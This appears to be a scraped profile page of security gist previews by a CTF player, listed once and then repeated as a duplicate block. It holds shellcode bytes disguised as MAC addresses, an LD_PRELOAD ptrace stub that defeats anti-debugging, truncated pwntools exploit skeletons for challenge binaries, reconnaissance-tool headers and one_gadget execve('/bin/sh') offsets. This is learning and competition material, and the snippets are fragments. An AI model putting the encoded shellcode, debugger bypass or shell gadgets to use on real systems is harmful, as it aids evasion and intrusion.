Abdeljalil Nouiri 0xPwny

## atomic.exe
atomic

## macs.txt
FC-E8-82-00-00-00
60-89-E5-31-C0-64
8B-50-30-8B-52-0C
8B-52-14-8B-72-28
0F-B7-4A-26-31-FF
AC-3C-61-7C-02-2C
20-C1-CF-0D-01-C7
E2-F2-52-57-8B-52
10-8B-4A-3C-8B-4C
11-78-E3-48-01-D1

## notes.txt
1: create and compile this code

long ptrace(int request, int pid, void *addr, void *data) {
    return 0;
}

#gcc -shared ptrace.c -o ptrace.so

2: set this env variable in both shell and gdb  :
export LD_PRELOAD=./ptrace.so

## junk.py
#IS THAT A REV CHALLENGE

local20 = "deadbeef"
local10 = 0x1505

counter = 0


while(counter < len(local20)):

## ad1.ps1
<#

.SYNOPSIS

    ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.

.DESCRIPTION

    ADRecon is a tool which extracts and combines various artefacts (as highlighted below) out of an AD environment. The information can be presented in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis and provide a holistic picture of the current state of the target AD environment.
    The tool is useful to various classes of security professionals like auditors, DFIR, students, administrators, etc. It can also be an invaluable post-exploitation tool for a penetration tester.

## exploit.py
#!/usr/bin/python

from pwn import *

r = process("./defi3")


def allocate(nom,idx):

	r.sendline("1")

## ynwp.sh
#!/bin/bash

#
# Copyright (c) 2016-2018
#
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under the terms of the GNU General Public License. See LICENSE
# file for usage of this software.
#

## exploit.py
from pwn import *

r = process("/root/pwnvm/challs/rootit/ch38")

pause()

def new(data):
	r.sendline("new {}".format(data))
	r.recvuntil(">")

## army.py
from pwn import *
import sys

#r = process("./army")
HOST=sys.argv[1]
PORT=sys.argv[2]

r = remote(HOST,int(PORT))
libc = ELF("libc.so.6")

## gist:739a6d05d1afad655e78908ad541d61b

0x46428 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4647c execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xe5765 execve("/bin/sh", rsp+0x50, environ)
	FC-E8-82-00-00-00
	60-89-E5-31-C0-64
	8B-50-30-8B-52-0C
	8B-52-14-8B-72-28
	0F-B7-4A-26-31-FF
	AC-3C-61-7C-02-2C
	20-C1-CF-0D-01-C7
	E2-F2-52-57-8B-52
	10-8B-4A-3C-8B-4C
	11-78-E3-48-01-D1
	1: create and compile this code

	long ptrace(int request, int pid, void addr, void data) {
	return 0;
	}

	#gcc -shared ptrace.c -o ptrace.so

	2: set this env variable in both shell and gdb :
	export LD_PRELOAD=./ptrace.so
	#IS THAT A REV CHALLENGE

	local20 = "deadbeef"
	local10 = 0x1505

	counter = 0


	while(counter < len(local20)):
	<#

	.SYNOPSIS

	ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.

	.DESCRIPTION

	ADRecon is a tool which extracts and combines various artefacts (as highlighted below) out of an AD environment. The information can be presented in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis and provide a holistic picture of the current state of the target AD environment.
	The tool is useful to various classes of security professionals like auditors, DFIR, students, administrators, etc. It can also be an invaluable post-exploitation tool for a penetration tester.
	#!/usr/bin/python

	from pwn import *

	r = process("./defi3")


	def allocate(nom,idx):

	r.sendline("1")
	#!/bin/bash

	#
	# Copyright (c) 2016-2018
	#
	# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
	# This is free software, and you are welcome to redistribute it
	# under the terms of the GNU General Public License. See LICENSE
	# file for usage of this software.
	#
	from pwn import *

	r = process("/root/pwnvm/challs/rootit/ch38")

	pause()

	def new(data):
	r.sendline("new {}".format(data))
	r.recvuntil(">")
	from pwn import *
	import sys

	#r = process("./army")
	HOST=sys.argv[1]
	PORT=sys.argv[2]

	r = remote(HOST,int(PORT))
	libc = ELF("libc.so.6")

	0x46428 execve("/bin/sh", rsp+0x30, environ)
	constraints:
	rax == NULL

	0x4647c execve("/bin/sh", rsp+0x30, environ)
	constraints:
	[rsp+0x30] == NULL

	0xe5765 execve("/bin/sh", rsp+0x50, environ)